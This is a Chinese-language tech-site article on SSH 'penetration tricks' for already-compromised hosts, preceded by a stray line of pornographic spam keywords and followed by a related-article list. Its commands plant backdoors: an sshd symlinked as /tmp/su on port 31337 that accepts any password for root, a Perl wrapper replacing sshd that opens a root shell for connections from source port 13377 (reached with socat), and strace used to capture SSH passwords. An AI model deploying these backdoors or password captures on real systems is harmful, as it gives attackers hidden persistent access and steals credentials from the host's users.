自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

滲透技巧之SSH篇

安全 數(shù)據(jù)安全
本文分享了有關(guān)SSH的滲透小技巧。

用些小技巧,蒙蒙菜鳥管理員。

1. 入侵得到SHELL后,對方防火墻沒限制,想快速開放一個(gè)可以訪問的SSH端口

肉雞上執(zhí)行

mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

就會派生一個(gè)31337端口,然后連接31337,用root/bin/ftp/mail當(dāng)用戶名,密碼隨意,就可登陸。

效果圖:

滲透技巧之SSH篇

2. 做一個(gè)SSH wrapper后門,效果比第一個(gè)好,沒有開放額外的端口,只要對方開了SSH服務(wù),就能遠(yuǎn)程連接

在肉雞上執(zhí)行:

[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

在本機(jī)執(zhí)行:

socat STDIO TCP4:10.18.180.20:22,sourceport=13377

如果你想修改源端口,可以用python的struct標(biāo)準(zhǔn)庫實(shí)現(xiàn)

>>> import struct
>>> buffer = struct.pack('>I6',19526)
>>> print repr(buffer)
'\x00\x00LF'
>>> buffer = struct.pack('>I6',13377)
>>> print buffer
4A

效果圖如下:

滲透技巧之SSH篇

3. 記錄SSH客戶端連接密碼

搞定主機(jī)后,往往想記錄肉雞SSH連接到其他主機(jī)的密碼,進(jìn)一步擴(kuò)大戰(zhàn)果,使用strace命令就行了。

效果圖:

滲透技巧之SSH篇

 

責(zé)任編輯:藍(lán)雨淚 來源: 網(wǎng)絡(luò)安全攻防實(shí)驗(yàn)室
相關(guān)推薦

2015-02-27 16:10:25

2009-08-17 14:47:31

2009-08-17 16:00:14

2009-08-26 10:49:54

2014-06-11 10:29:03

2020-11-16 16:13:06

網(wǎng)絡(luò)安全互聯(lián)網(wǎng)滲透測試

2015-10-27 11:11:46

2016-03-30 09:58:16

2018-09-17 09:03:47

WindowsToken滲透

2013-08-21 16:15:15

2014-05-30 09:41:16

2012-11-28 17:51:50

2021-10-11 10:39:13

內(nèi)網(wǎng)信息收集

2022-02-21 14:14:03

SSH加密密鑰

2019-12-22 23:10:19

LinuxSSH加密

2009-01-05 15:31:41

2011-07-01 16:05:22

SEO

2017-03-01 11:52:30

2020-04-02 11:11:27

黑客網(wǎng)絡(luò)安全域名采集

2011-10-26 20:55:43

ssh 安全
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號